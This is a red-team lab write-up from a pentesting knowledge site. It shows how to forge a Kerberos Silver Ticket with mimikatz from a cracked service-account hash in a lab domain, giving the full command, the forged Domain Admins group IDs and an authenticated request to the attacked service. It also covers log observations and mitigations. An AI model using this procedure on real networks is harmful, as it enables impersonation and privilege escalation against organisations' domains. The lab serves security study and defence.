Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
From Domain Admin to Enterprise Admin
Kerberoasting
Kerberos: Golden Tickets
Kerberos: Silver Tickets
AS-REP Roasting
Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled
Kerberos Unconstrained Delegation
Kerberos Constrained Delegation
Kerberos Resource-based Constrained Delegation: Computer Object Take Over
Domain Compromise via DC Print Server and Kerberos Delegation
DCShadow - Becoming a Rogue Domain Controller
DCSync: Dump Password Hashes from Domain Controller
PowerView: Active Directory Enumeration
Abusing Active Directory ACLs/ACEs
Privileged Accounts and Token Privileges
From DnsAdmins to SYSTEM to Domain Compromise
Pass the Hash with Machine$ Accounts
BloodHound with Kali Linux: 101
Backdooring AdminSDHolder for Persistence
Active Directory Enumeration with AD Module without RSAT or Admin Privileges
Enumerating AD Object Permissions with dsacls
Active Directory Password Spraying
Active Directory Lab with Hyper-V and PowerShell
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows / OS Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

Kerberos: Silver Tickets

Credential Access

This lab looks at the technique of forging a cracked TGS Kerberos ticket in order to impersonate another user and escalate privileges from the perspective of a service the TGS was cracked for.

This lab builds on the explorations in T1208: Kerberoasting where a TGS ticket got cracked.

Execution

I will be using mimikatz to create a Kerberos Silver Ticket - forging/rewriting the cracked ticket with some new details that benefit me as an attacker.

Below is a table with values supplied to mimikatz explained and the command itself:

Argument

Notes

/sid:S-1-5-21-4172452648-1021989953-2368502130-1105

SID of the current user who is forging the ticket. Retrieved with whoami /user

/target:dc-mantvydas.offense.local

server hosting the attacked service for which the TGS ticket was cracked

/service:http

service type being attacked

/rc4:a87f3a337d73085c45f9416be5787d86

NTLM hash of the password the TGS ticket was encrypted with. Passw0rd in our case

/user:beningnadmin

Forging the user name. This is the user name that will appear in the windows security logs - fun.

/id:1155

Forging user's RID - fun

/ptt

Instructs mimikatz to inject the forged ticket to memory to make it usable immediately

Getting our user's SID as explained in the first step in the above table:

Getting a user's SID

Issuing the final mimikatz command to create our forged (silver) ticket:

[email protected]
mimikatz # kerberos::golden /sid:S-1-5-21-4172452648-1021989953-2368502130-1105 /domain:offense.local /ptt /id:1155 /target:dc-mantvydas.offense.local /service:http /rc4:a87f3a337d73085c45f9416be5787d86 /user:beningnadmin

Checking available tickets in memory with klist - note how the ticket shows our forged username benignadmin and a forged user id:

Note in the above mimikatz window the Group IDs which our fake user benignadmin is now a member of due to the forged ticket:

GID

Group Name

512

Domain Admins

513

Domain Users

518

Schema Admins

519

Enterprise Admins

520

Group Policy Creator Owners

Initiating a request to the attacked service with a TGS ticket - note that the authentication is successfull:

[email protected]
Invoke-WebRequest -UseBasicParsing -UseDefaultCredentials http://dc-mantvydas.offense.local

Observations

Note a network logon from benignadmin as well as forged RIDs:

It is better not to use user accounts for running services on them, but if you do, make sure to use really strong passwords! Computer accounts generate long and complex passwords and they change frequently, so they are better suited for running services on. Better yet, follow good practices such as using Group Managed Service Accounts for running more secure services.

References

Previous
Kerberos: Golden Tickets
Next
AS-REP Roasting
Last updated 2 years ago
Contents
Execution
Observations
References